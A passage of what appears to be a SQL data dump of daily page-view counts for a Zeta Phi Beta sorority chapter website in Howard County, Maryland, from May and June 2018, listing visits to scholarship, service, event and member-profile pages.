'/service/appa/','2018-05-02',5,781),('/service/','2018-05-02',1,247),('/scholarship/','2018-05-02',4,797),('/scholarship/application/','2018-05-02',2,804),('/history/','2018-05-02',5,190),('/membership/','2018-05-02',2,576),('/','2018-05-03',71,6),('/history/','2018-05-03',3,190),('/service/appa/','2018-05-03',5,781),('/?wc-ajax=get_refreshed_fragments','2018-05-03',9,6),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-05-03',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-03',2,1258),('/lgz-celebrates-35-years-service-howard-county-md','2018-05-03',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-03',2,956),('/scholarship','2018-05-03',1,797),('/scholarship/','2018-05-03',4,797),('/event/howard-county-volunteer-year-reception','2018-05-03',1,1268),('/event/howard-county-volunteer-year-reception/','2018-05-03',2,1268),('/membership/','2018-05-03',1,576),('/lgz-launches-new-college-preparation-workshops/','2018-05-03',2,1243),('/service/','2018-05-03',1,247),('/service/breakfastonthego/','2018-05-03',1,772),('/service/youth/','2018-05-03',1,738),('/service/zen/','2018-05-03',1,786),('/event/a-pretty-polished-affair/','2018-05-03',1,485),('/event/breakfast-on-the-go/','2018-05-03',1,493),('/event/march-dimes-march-babies/','2018-05-03',1,1007),('/event/ms-walk-2017/','2018-05-03',1,1020),('/scholarship/recommendation/','2018-05-03',1,1170),('/','2018-05-04',55,6),('/service/appa/','2018-05-04',5,781),('/?wc-ajax=get_refreshed_fragments','2018-05-04',7,6),('/event/march-dimes-march-babies/','2018-05-04',1,1007),('/service/','2018-05-04',3,247),('/history/','2018-05-04',2,190),('/scholarship/','2018-05-04',1,797),('/service/breakfastonthego/','2018-05-04',1,772),('/service/youth/','2018-05-04',1,738),('/service/zen/','2018-05-04',1,786),('/event/a-pretty-polished-affair/','2018-05-04',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-04',1,1258),('/scholarship/lgzscholarshipreleaseform/','2018-05-04',1,1173),('/','2018-05-05',35,6),('/service/','2018-05-05',2,247),('/service/appa/','2018-05-05',6,781),('/?wc-ajax=get_refreshed_fragments','2018-05-05',11,6),('/history/','2018-05-05',3,190),('/scholarship/','2018-05-05',3,797),('/service/breakfastonthego/','2018-05-05',1,772),('/service/youth/','2018-05-05',1,738),('/service/zen/','2018-05-05',1,786),('/event/a-pretty-polished-affair/','2018-05-05',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-05',1,1258),('/event/howard-county-volunteer-year-reception/','2018-05-05',1,1268),('/event/ms-walk-2017/','2018-05-05',1,1020),('/event/breakfast-on-the-go/','2018-05-05',2,493),('/event/march-dimes-march-babies/','2018-05-05',1,1007),('/lgz-launches-new-college-preparation-workshops/','2018-05-05',3,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-05',1,956),('/','2018-05-06',71,6),('/?wc-ajax=get_refreshed_fragments','2018-05-06',26,6),('/history/','2018-05-06',2,190),('/service/appa/','2018-05-06',6,781),('/scholarship/','2018-05-06',5,797),('/service/zen/','2018-05-06',2,786),('/scholarship/application/','2018-05-06',1,804),('/event/breakfast-on-the-go/','2018-05-06',2,493),('/event/ms-walk-2017/','2018-05-06',1,1020),('/event/a-pretty-polished-affair/','2018-05-06',1,485),('/service/youth/','2018-05-06',1,738),('/event/howard-county-volunteer-year-reception/','2018-05-06',1,1268),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-06',1,1258),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-05-06',2,689),('/scholarship/recommendation/','2018-05-06',1,1170),('/','2018-05-07',48,6),('/scholarship/','2018-05-07',2,797),('/service/appa/','2018-05-07',7,781),('/history/','2018-05-07',2,190),('/service/','2018-05-07',2,247),('/service/breakfastonthego/','2018-05-07',2,772),('/service/youth/','2018-05-07',2,738),('/service/zen/','2018-05-07',2,786),('/event/a-pretty-polished-affair/','2018-05-07',2,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-07',2,1258),('/event/howard-county-volunteer-year-reception/','2018-05-07',2,1268),('/event/ms-walk-2017/','2018-05-07',2,1020),('/event/breakfast-on-the-go/','2018-05-07',2,493),('/lgz-launches-new-college-preparation-workshops/','2018-05-07',2,1243),('/event/march-dimes-march-babies/','2018-05-07',2,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-07',2,956),('/scholarship/soror-conway1/','2018-05-07',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-05-07',1,1173),('/ts_teams/josephine-gross/','2018-05-07',1,1232),('/ts_teams/oretta-timmons/','2018-05-07',1,1230),('/ts_teams/yasmine-allen/','2018-05-07',1,1228),('/ts_teams/jelani-dula/','2018-05-07',1,1226),('/ts_teams/christopher-flowers/','2018-05-07',1,1224),('/ts_teams/journey-mcmillan/','2018-05-07',1,1222),('/ts_teams/nicholas-claud/','2018-05-07',1,1220),('/?wc-ajax=get_refreshed_fragments','2018-05-07',7,6),('/?wc-ajax=get_refreshed_fragments','2018-05-08',14,6),('/','2018-05-08',59,6),('/service/appa/','2018-05-08',4,781),('/history/','2018-05-08',1,190),('/scholarship/application/','2018-05-08',3,804),('/scholarship/','2018-05-08',7,797),('/service/','2018-05-08',1,247),('/scholarship/recommendation/','2018-05-08',3,1170),('/user/','2018-05-08',2,547),('/','2018-05-09',57,6),('/user/','2018-05-09',1,547),('/scholarship/recommendation/','2018-05-09',1,1170),('/?wc-ajax=get_refreshed_fragments','2018-05-09',4,6),('/scholarship/','2018-05-09',2,797),('/service/youth/','2018-05-09',1,738),('/lgz-launches-new-college-preparation-workshops/','2018-05-10',2,1243),('/?wc-ajax=get_refreshed_fragments','2018-05-10',12,6),('/','2018-05-10',34,6),('/service/appa/','2018-05-10',7,781),('/service/','2018-05-10',1,247),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-10',1,956),('/','2018-05-11',43,6),('/service/appa/','2018-05-11',5,781),('/?wc-ajax=get_refreshed_fragments','2018-05-11',9,6),('/ts_teams/angela-jefferson/','2018-05-11',1,874),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-11',1,956),('/scholarship/','2018-05-11',4,797),('/scholarship/application/','2018-05-11',1,804),('/history/','2018-05-11',1,190),('/','2018-05-12',57,6),('/lgz-launches-new-college-preparation-workshops/','2018-05-12',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-12',1,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-12',1,1258),('/event/ms-walk-2017/','2018-05-12',1,1020),('/event/march-dimes-march-babies/','2018-05-12',1,1007),('/event/howard-county-volunteer-year-reception/','2018-05-12',1,1268),('/event/breakfast-on-the-go/','2018-05-12',1,493),('/event/a-pretty-polished-affair/','2018-05-12',1,485),('/service/zen/','2018-05-12',1,786),('/service/youth/','2018-05-12',1,738),('/service/breakfastonthego/','2018-05-12',1,772),('/service/appa/','2018-05-12',6,781),('/?wc-ajax=get_refreshed_fragments','2018-05-12',5,6),('/scholarship/','2018-05-12',1,797),('/','2018-05-13',26,6),('/?wc-ajax=get_refreshed_fragments','2018-05-13',14,6),('/service/appa/','2018-05-13',6,781),('/service/breakfastonthego/','2018-05-13',1,772),('/ts_teams/helen-newman/','2018-05-13',1,868),('/ts_teams/angela-jefferson/','2018-05-13',1,874),('/ts_teams/lillet-williams-2/','2018-05-13',1,824),('/ts_teams/tamika-r-daniels/','2018-05-13',1,814),('/event/a-pretty-polished-affair/','2018-05-13',1,485),('/history/','2018-05-13',2,190),('/','2018-05-14',41,6),('/service/appa/','2018-05-14',4,781),('/?wc-ajax=get_refreshed_fragments','2018-05-14',5,6),('/','2018-05-15',52,6),('/event/a-pretty-polished-affair/','2018-05-15',1,485),('/event/breakfast-on-the-go/','2018-05-15',1,493),('/event/march-dimes-march-babies/','2018-05-15',1,1007),('/event/howard-county-volunteer-year-reception/','2018-05-15',1,1268),('/event/ms-walk-2017/','2018-05-15',1,1020),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-15',1,1258),('/history/','2018-05-15',2,190),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-15',1,956),('/lgz-launches-new-college-preparation-workshops/','2018-05-15',1,1243),('/?wc-ajax=get_refreshed_fragments','2018-05-15',15,6),('/service/appa/','2018-05-15',8,781),('/scholarship/','2018-05-15',1,797),('/','2018-05-16',40,6),('/scholarship/','2018-05-16',5,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-16',2,956),('/?wc-ajax=get_refreshed_fragments','2018-05-16',6,6),('/event/ms-walk-2017/','2018-05-16',1,1020),('/scholarship/application/','2018-05-16',1,804),('/scholarship/recommendation/','2018-05-16',1,1170),('/','2018-05-17',50,6),('/event/howard-county-volunteer-year-reception','2018-05-17',2,1268),('/event/howard-county-volunteer-year-reception/','2018-05-17',2,1268),('/scholarship','2018-05-17',2,797),('/scholarship/','2018-05-17',6,797),('/lgz-celebrates-35-years-service-howard-county-md','2018-05-17',2,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-17',2,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-05-17',2,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-05-17',2,1258),('/?wc-ajax=get_refreshed_fragments','2018-05-17',13,6),('/service/appa/','2018-05-17',4,781),('/history/','2018-05-17',10,190),('/ts_teams/dawn-j-kemp/','2018-05-17',1,817),('/scholarship/recommendation/','2018-05-17',1,1170),('/service/breakfastonthego/','2018-05-17',3,772),('/service/','2018-05-17',2,247),('/service/youth/','2018-05-17',2,738),('/ts_teams/josephine-gross/','2018-05-17',2,1232),('/ts_teams/oretta-timmons/','2018-05-17',2,1230),('/ts_teams/yasmine-allen/','2018-05-17',2,1228),('/ts_teams/jelani-dula/','2018-05-17',2,1226),('/ts_teams/christopher-flowers/','2018-05-17',2,1224),('/ts_teams/journey-mcmillan/','2018-05-17',2,1222),('/ts_teams/nicholas-claud/','2018-05-17',2,1220),('/?wc-ajax=get_refreshed_fragments','2018-05-18',5,6),('/','2018-05-18',27,6),('/ts_teams/linda-price/','2018-05-18',1,867),('/history/','2018-05-18',2,190),('/membership/','2018-05-18',3,576),('/service/','2018-05-18',2,247),('/','2018-05-19',45,6),('/?wc-ajax=get_refreshed_fragments','2018-05-19',5,6),('/membership/','2018-05-19',2,576),('/scholarship/','2018-05-19',1,797),('/service/zen/','2018-05-19',1,786),('/service/youth/','2018-05-19',1,738),('/service/appa/','2018-05-19',1,781),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-19',1,956),('/service/breakfastonthego/','2018-05-19',1,772),('/','2018-05-20',26,6),('/membership/','2018-05-20',1,576),('/scholarship/recommendation/','2018-05-20',2,1170),('/?wc-ajax=get_refreshed_fragments','2018-05-20',16,6),('/scholarship/','2018-05-20',3,797),('/ts_teams/lillet-williams-2/','2018-05-20',2,824),('/scholarship','2018-05-20',1,797),('/history/','2018-05-20',4,190),('/','2018-05-21',58,6),('/history/','2018-05-21',17,190),('/?wc-ajax=get_refreshed_fragments','2018-05-21',12,6),('/service/zen/','2018-05-21',3,786),('/scholarship/','2018-05-21',2,797),('/service/','2018-05-21',2,247),('/service/appa/','2018-05-21',3,781),('/service/breakfastonthego/','2018-05-21',2,772),('/service/youth/','2018-05-21',2,738),('/lgz-launches-new-college-preparation-workshops/','2018-05-21',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-21',2,956),('/scholarship/soror-conway1/','2018-05-21',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-05-21',1,1173),('/ts_teams/josephine-gross/','2018-05-21',1,1232),('/ts_teams/oretta-timmons/','2018-05-21',1,1230),('/ts_teams/yasmine-allen/','2018-05-21',1,1228),('/ts_teams/jelani-dula/','2018-05-21',1,1226),('/ts_teams/christopher-flowers/','2018-05-21',1,1224),('/ts_teams/journey-mcmillan/','2018-05-21',1,1222),('/ts_teams/nicholas-claud/','2018-05-21',1,1220),('/?up_auto_log=true','2018-05-21',2,6),('/','2018-05-22',44,6),('/?up_auto_log=true','2018-05-22',1,6),('/?wc-ajax=get_refreshed_fragments','2018-05-22',3,6),('/service/appa/','2018-05-22',1,781),('/ts_teams/rosee-ragin/','2018-05-22',1,866),('/','2018-05-23',47,6),('/history/','2018-05-23',5,190),('/scholarship/','2018-05-23',2,797),('/service/appa/','2018-05-23',2,781),('/service/','2018-05-23',2,247),('/service/breakfastonthego/','2018-05-23',1,772),('/service/youth/','2018-05-23',1,738),('/service/zen/','2018-05-23',1,786),('/lgz-launches-new-college-preparation-workshops/','2018-05-23',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-23',2,956),('/scholarship/recommendation/','2018-05-23',1,1170),('/?wc-ajax=get_refreshed_fragments','2018-05-23',5,6),('/','2018-05-24',47,6),('/?wc-ajax=get_refreshed_fragments','2018-05-24',6,6),('/history/','2018-05-24',6,190),('/scholarship/','2018-05-24',2,797),('/ts_teams/tracy-irvin/','2018-05-24',2,815),('/history','2018-05-24',1,190),('/lgz-launches-new-college-preparation-workshops/','2018-05-24',1,1243),('/scholarship','2018-05-24',1,797),('/service/youth','2018-05-24',1,738),('/lgz-celebrates-35-years-service-howard-county-md','2018-05-24',1,956),('/service/youth/','2018-05-24',1,738),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-24',1,956),('/','2018-05-25',56,6),('/?wc-ajax=get_refreshed_fragments','2018-05-25',12,6),('/service/zen/','2018-05-25',1,786),('/history/','2018-05-25',5,190),('/scholarship/','2018-05-25',2,797),('/service/','2018-05-25',4,247),('/service/appa/','2018-05-25',1,781),('/service/breakfastonthego/','2018-05-25',1,772),('/service/youth/','2018-05-25',1,738),('/lgz-launches-new-college-preparation-workshops/','2018-05-25',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-25',1,956),('/','2018-05-26',25,6),('/ts_teams/helen-newman/','2018-05-26',1,868),('/?wc-ajax=get_refreshed_fragments','2018-05-26',4,6),('/history/','2018-05-26',1,190),('/','2018-05-27',56,6),('/?wc-ajax=get_refreshed_fragments','2018-05-27',8,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-27',8,956),('/scholarship/','2018-05-27',3,797),('/service/','2018-05-27',2,247),('/lgz-launches-new-college-preparation-workshops/','2018-05-27',2,1243),('/','2018-05-28',28,6),('/ts_teams/christy-lewis/','2018-05-28',1,818),('/ts_teams/jelani-dula/','2018-05-28',1,1226),('/?wc-ajax=get_refreshed_fragments','2018-05-28',5,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-28',1,956),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-05-28',1,689),('/','2018-05-29',65,6),('/?wc-ajax=get_refreshed_fragments','2018-05-29',10,6),('/index.php','2018-05-29',1,6),('/scholarship/','2018-05-29',6,797),('/service/youth/','2018-05-29',2,738),('/history/','2018-05-29',5,190),('/service/','2018-05-29',2,247),('/service/appa/','2018-05-29',3,781),('/service/breakfastonthego/','2018-05-29',2,772),('/service/zen/','2018-05-29',2,786),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-29',2,956),('/lgz-launches-new-college-preparation-workshops/','2018-05-29',2,1243),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-05-29',1,689),('/scholarship','2018-05-29',1,797),('/','2018-05-30',40,6),('/?wc-ajax=get_refreshed_fragments','2018-05-30',10,6),('/history/','2018-05-30',4,190),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-05-30',3,689),('/scholarship/','2018-05-30',4,797),('/scholarship/soror-conway1/','2018-05-30',1,1179),('/scholarship/application/','2018-05-30',1,804),('/','2018-05-31',35,6),('/?wc-ajax=get_refreshed_fragments','2018-05-31',6,6),('/lgz-launches-new-college-preparation-workshops/','2018-05-31',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-05-31',1,956),('/service/zen/','2018-05-31',1,786),('/service/youth/','2018-05-31',4,738),('/service/breakfastonthego/','2018-05-31',1,772),('/service/appa/','2018-05-31',1,781),('/service/','2018-05-31',1,247),('/scholarship/','2018-05-31',2,797),('/history/','2018-05-31',1,190),('/ts_teams/linda-brigmon/','2018-06-01',1,886),('/?wc-ajax=get_refreshed_fragments','2018-06-01',4,6),('/','2018-06-01',56,6),('/scholarship','2018-06-01',1,797),('/scholarship/','2018-06-01',1,797),('/service/','2018-06-01',9,247),('/','2018-06-02',46,6),('/?wc-ajax=get_refreshed_fragments','2018-06-02',4,6),('/service/','2018-06-02',11,247),('/history/','2018-06-02',3,190),('/service/appa/','2018-06-02',1,781),('/scholarship/','2018-06-02',1,797),('/service/breakfastonthego/','2018-06-02',1,772),('/service/youth/','2018-06-02',1,738),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-02',1,956),('/service/zen/','2018-06-02',1,786),('/lgz-launches-new-college-preparation-workshops/','2018-06-02',1,1243),('/service/','2018-06-03',13,247),('/','2018-06-03',39,6),('/?wc-ajax=get_refreshed_fragments','2018-06-03',4,6),('/history/','2018-06-03',1,190),('/service/zen/','2018-06-03',1,786),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-03',1,956),('/scholarship/','2018-06-03',1,797),('/service/appa/','2018-06-03',1,781),('/service/youth/','2018-06-03',2,738),('/lgz-launches-new-college-preparation-workshops/','2018-06-03',1,1243),('/service/breakfastonthego/','2018-06-03',1,772),('/','2018-06-04',50,6),('/service/','2018-06-04',19,247),('/?wc-ajax=get_refreshed_fragments','2018-06-04',7,6),('/history/','2018-06-04',1,190),('/scholarship/','2018-06-04',3,797),('/service/appa/','2018-06-04',1,781),('/service/breakfastonthego/','2018-06-04',1,772),('/service/youth/','2018-06-04',2,738),('/service/zen/','2018-06-04',1,786),('/lgz-launches-new-college-preparation-workshops/','2018-06-04',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-04',1,956),('/scholarship/soror-conway1/','2018-06-04',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-06-04',1,1173),('/ts_teams/josephine-gross/','2018-06-04',1,1232),('/ts_teams/oretta-timmons/','2018-06-04',1,1230),('/ts_teams/yasmine-allen/','2018-06-04',1,1228),('/ts_teams/jelani-dula/','2018-06-04',1,1226),('/ts_teams/christopher-flowers/','2018-06-04',1,1224),('/ts_teams/journey-mcmillan/','2018-06-04',1,1222),('/ts_teams/nicholas-claud/','2018-06-04',1,1220),('/scholarship/recommendation/','2018-06-04',1,1170),('/ts_teams/linda-brigmon/','2018-06-04',1,886),('/ts_teams/dawn-j-kemp/','2018-06-05',1,817),('/?wc-ajax=get_refreshed_fragments','2018-06-05',7,6),('/ts_teams/gloria-sanders/','2018-06-05',1,865),('/','2018-06-05',35,6),('/service/','2018-06-05',13,247),('/scholarship/','2018-06-05',2,797),('/ts_teams/oretta-timmons/','2018-06-05',1,1230),('/service/breakfastonthego/','2018-06-05',1,772),('/ts_teams/journey-mcmillan/','2018-06-05',1,1222),('/scholarship/soror-conway1/','2018-06-05',1,1179),('/history/','2018-06-05',1,190),('/download/aarc/','2018-06-05',1,991),('/scholarship/application/','2018-06-05',1,804),('/ts_teams/jelani-dula/','2018-06-05',1,1226),('/','2018-06-06',42,6),('/?wc-ajax=get_refreshed_fragments','2018-06-06',6,6),('/service/','2018-06-06',11,247),('/service/breakfastonthego/','2018-06-06',2,772),('/history/','2018-06-06',3,190),('/scholarship/','2018-06-06',1,797),('/service/youth/','2018-06-06',2,738),('/service/appa/','2018-06-06',1,781),('/service/','2018-06-07',7,247),('/','2018-06-07',43,6),('/?wc-ajax=get_refreshed_fragments','2018-06-07',6,6),('/ts_teams/linda-brigmon/','2018-06-07',1,886),('/service/breakfastonthego/','2018-06-07',1,772),('/ts_teams/shanee-satchell/','2018-06-07',1,820),('/index.php','2018-06-07',1,6),('/','2018-06-08',54,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-08',1,956),('/service/youth/','2018-06-08',1,738),('/scholarship/','2018-06-08',1,797),('/history/','2018-06-08',4,190),('/service/','2018-06-08',8,247),('/service/appa/','2018-06-08',2,781),('/service/breakfastonthego/','2018-06-08',1,772),('/service/zen/','2018-06-08',1,786),('/lgz-launches-new-college-preparation-workshops/','2018-06-08',1,1243),('/?wc-ajax=get_refreshed_fragments','2018-06-08',8,6),('/','2018-06-09',62,6),('/service/','2018-06-09',14,247),('/index.php?option=com_user&task=register','2018-06-09',2,6),('/?option=com_user&task=register','2018-06-09',2,6),('/?wc-ajax=get_refreshed_fragments','2018-06-09',3,6),('/scholarship/','2018-06-09',1,797),('/service/appa/','2018-06-09',1,781),('/history/','2018-06-09',2,190),('/?wc-ajax=get_refreshed_fragments','2018-06-10',6,6),('/','2018-06-10',32,6),('/service/','2018-06-10',14,247),('/service/appa/','2018-06-10',2,781),('/history/','2018-06-10',1,190),('/service/zen/','2018-06-10',1,786),('/service/youth/','2018-06-10',1,738),('/scholarship/','2018-06-10',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-10',1,956),('/lgz-launches-new-college-preparation-workshops/','2018-06-10',1,1243),('/service/breakfastonthego/','2018-06-10',1,772),('/service/','2018-06-11',7,247),('/','2018-06-11',55,6),('/?wc-ajax=get_refreshed_fragments','2018-06-11',6,6),('/history/','2018-06-11',6,190),('/scholarship/','2018-06-11',2,797),('/service/appa/','2018-06-11',4,781),('/service/breakfastonthego/','2018-06-11',2,772),('/service/youth/','2018-06-11',4,738),('/service/zen/','2018-06-11',3,786),('/ts_teams/linda-brigmon/','2018-06-11',1,886),('/lgz-launches-new-college-preparation-workshops/','2018-06-11',1,1243),('/ts_teams/nicholas-claud/','2018-06-11',1,1220),('/ts_teams/josephine-gross/','2018-06-11',1,1232),('/ts_teams/christopher-flowers/','2018-06-11',1,1224),('/ts_teams/jelani-dula/','2018-06-11',1,1226),('/ts_teams/yasmine-allen/','2018-06-11',1,1228),('/ts_teams/oretta-timmons/','2018-06-11',1,1230),('/ts_teams/journey-mcmillan/','2018-06-11',1,1222),('/scholarship/recommendation/','2018-06-11',1,1170),('/scholarship/application/','2018-06-11',1,804),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-11',1,956),('/scholarship/soror-conway1/','2018-06-11',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-06-11',1,1173),('/','2018-06-12',53,6),('/service/','2018-06-12',12,247),('/history/','2018-06-12',5,190),('/scholarship/lgzscholarshipreleaseform/','2018-06-12',3,1173),('/?wc-ajax=get_refreshed_fragments','2018-06-12',4,6),('/scholarship/','2018-06-12',5,797),('/service/appa/','2018-06-12',3,781),('/service/breakfastonthego/','2018-06-12',2,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-12',2,956),('/event/ellicott-city-relief-fund/','2018-06-12',2,1280),('/lgz-launches-new-college-preparation-workshops/','2018-06-12',2,1243),('/service/youth/','2018-06-12',2,738),('/service/zen/','2018-06-12',2,786),('/lgz-launches-new-college-preparation-workshops/feed/','2018-06-12',1,1243),('/ts_teams/yasmine-allen/','2018-06-12',2,1228),('/?p=956','2018-06-12',1,956),('/ts_teams/oretta-timmons/','2018-06-12',2,1230),('/ts_teams/nicholas-claud/','2018-06-12',2,1220),('/scholarship/soror-conway1/','2018-06-12',2,1179),('/ts_teams/journey-mcmillan/','2018-06-12',2,1222),('/ts_teams/jelani-dula/','2018-06-12',2,1226),('/ts_teams/josephine-gross/','2018-06-12',2,1232),('/?p=1243','2018-06-12',1,1243),('/ts_teams/christopher-flowers/','2018-06-12',2,1224),('/cause/march-of-dimes/','2018-06-12',1,1023),('/service/','2018-06-13',17,247),('/cause/marchofdimes-2/','2018-06-13',2,90),('/ts_teams/constance-kinder/','2018-06-13',2,822),('/ts_teams/jeaneathia-yerby-crowder/','2018-06-13',2,828),('/ts_teams/kathy-j-barrett/','2018-06-13',2,819),('/ts_teams/tamara-curtis/','2018-06-13',2,821),('/cause/scholarship/','2018-06-13',2,59),('/ts_teams/christy-lewis/','2018-06-13',2,818),('/product/denim-pearls-tickets/','2018-06-13',2,531),('/cause/march-of-dimes/','2018-06-13',1,1023),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-06-13',2,689),('/ts_teams/tracy-irvin/','2018-06-13',2,815),('/ts_teams/tamika-r-daniels/','2018-06-13',2,814),('/ts_teams/crystal-whitaker/','2018-06-13',4,816),('/ts_teams/cherice-daniel-2/','2018-06-13',2,825),('/ts_slider/567/','2018-06-13',2,567),('/ts_teams/lillet-williams/','2018-06-13',2,823),('/ts_teams/lillet-williams-2/','2018-06-13',2,824),('/ts_teams/shanee-satchell/','2018-06-13',2,820),('/','2018-06-13',64,6),('/?wc-ajax=get_refreshed_fragments','2018-06-13',13,6),('/ts_teams/nathalia-drew/','2018-06-13',2,1084),('/ts_teams/kathy-ball/','2018-06-13',2,887),('/ts_teams/kalima-alawode/','2018-06-13',2,888),('/ts_teams/linda-brigmon/','2018-06-13',1,886),('/service/appa/','2018-06-13',6,781),('/?up_auto_log=true','2018-06-13',2,6),('/history','2018-06-13',1,190),('/history/','2018-06-13',2,190),('/event/ellicott-city-relief-fund/','2018-06-13',2,1280),('/scholarship/','2018-06-13',1,797),('/service/breakfastonthego/','2018-06-13',1,772),('/service/youth/','2018-06-13',1,738),('/service/zen/','2018-06-13',1,786),('/lgz-launches-new-college-preparation-workshops/','2018-06-13',1,1243),('/','2018-06-14',36,6),('/?wc-ajax=get_refreshed_fragments','2018-06-14',14,6),('/event/ellicott-city-relief-fund/','2018-06-14',1,1280),('/history/','2018-06-14',3,190),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-14',2,956),('/scholarship/','2018-06-14',2,797),('/service/','2018-06-14',7,247),('/lgz-launches-new-college-preparation-workshops/','2018-06-14',2,1243),('/service/breakfastonthego/','2018-06-14',1,772),('/service/appa/','2018-06-14',5,781),('/service/youth/','2018-06-14',1,738),('/service/zen/','2018-06-14',1,786),('/scholarship/application/','2018-06-14',3,804),('/scholarship/lgzscholarshipreleaseform/','2018-06-14',1,1173),('/scholarship/recommendation/','2018-06-14',1,1170),('/ts_teams/christopher-flowers/','2018-06-14',1,1224),('/ts_teams/jelani-dula/','2018-06-14',1,1226),('/scholarship/soror-conway1/','2018-06-14',1,1179),('/ts_teams/josephine-gross/','2018-06-14',1,1232),('/ts_teams/nicholas-claud/','2018-06-14',1,1220),('/ts_teams/journey-mcmillan/','2018-06-14',1,1222),('/ts_teams/yasmine-allen/','2018-06-14',1,1228),('/ts_teams/oretta-timmons/','2018-06-14',1,1230),('/lgz-celebrates-35-years-service-howard-county-md','2018-06-14',1,956),('/service/appa','2018-06-14',1,781),('/service','2018-06-14',1,247),('/ts_teams/sandra-hudson/','2018-06-14',3,875),('/scholarship','2018-06-14',1,797),('/','2018-06-15',43,6),('/service/','2018-06-15',12,247),('/service/appa/','2018-06-15',2,781),('/?wc-ajax=get_refreshed_fragments','2018-06-15',7,6),('/history/','2018-06-15',3,190),('/scholarship/','2018-06-15',3,797),('/ts_teams/yasmine-allen/','2018-06-15',1,1228),('/event/ellicott-city-relief-fund/','2018-06-15',1,1280),('/service/youth/','2018-06-15',2,738),('/lgz-launches-new-college-preparation-workshops/','2018-06-15',1,1243),('/ts_teams/constance-kinder/','2018-06-15',1,822),('/service/breakfastonthego/','2018-06-15',1,772),('/','2018-06-16',30,6),('/service/','2018-06-16',6,247),('/ts_teams/linda-brigmon/','2018-06-16',1,886),('/service/appa/','2018-06-16',5,781),('/?wc-ajax=get_refreshed_fragments','2018-06-16',6,6),('/lgz-launches-new-college-preparation-workshops/','2018-06-16',1,1243),('/?wc-ajax=get_refreshed_fragments','2018-06-17',12,6),('/service/','2018-06-17',18,247),('/','2018-06-17',32,6),('/ts_teams/rose-matthews/','2018-06-17',1,870),('/service/appa/','2018-06-17',3,781),('/scholarship','2018-06-17',1,797),('/scholarship/','2018-06-17',3,797),('/service/youth/','2018-06-17',2,738),('/history/','2018-06-17',1,190),('/lgz-launches-new-college-preparation-workshops/','2018-06-17',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-17',1,956),('/download/constitution-by-laws/','2018-06-18',2,989),('/?wc-ajax=get_refreshed_fragments','2018-06-18',11,6),('/','2018-06-18',51,6),('/service/appa/','2018-06-18',7,781),('/service/','2018-06-18',5,247),('/history/','2018-06-18',1,190),('/scholarship/','2018-06-18',1,797),('/service/breakfastonthego/','2018-06-18',1,772),('/service/youth/','2018-06-18',1,738),('/service/zen/','2018-06-18',1,786),('/event/ellicott-city-relief-fund/','2018-06-18',1,1280),('/lgz-launches-new-college-preparation-workshops/','2018-06-18',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-18',1,956),('/scholarship/soror-conway1/','2018-06-18',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-06-18',1,1173),('/ts_teams/josephine-gross/','2018-06-18',1,1232),('/ts_teams/oretta-timmons/','2018-06-18',1,1230),('/ts_teams/yasmine-allen/','2018-06-18',1,1228),('/ts_teams/jelani-dula/','2018-06-18',1,1226),('/ts_teams/christopher-flowers/','2018-06-18',1,1224),('/ts_teams/journey-mcmillan/','2018-06-18',1,1222),('/ts_teams/nicholas-claud/','2018-06-18',1,1220),('/','2018-06-19',33,6),('/service/','2018-06-19',14,247),('/?wc-ajax=get_refreshed_fragments','2018-06-19',8,6),('/history/','2018-06-19',2,190),('/service/appa/','2018-06-19',4,781),('/service/zen/','2018-06-19',1,786),('/ts_teams/kathy-ball/','2018-06-19',1,887),('/','2018-06-20',47,6),('/cause/marchofdimes-2/','2018-06-20',2,90),('/lgz-celebrates-35-years-service-howard-county-md','2018-06-20',2,956)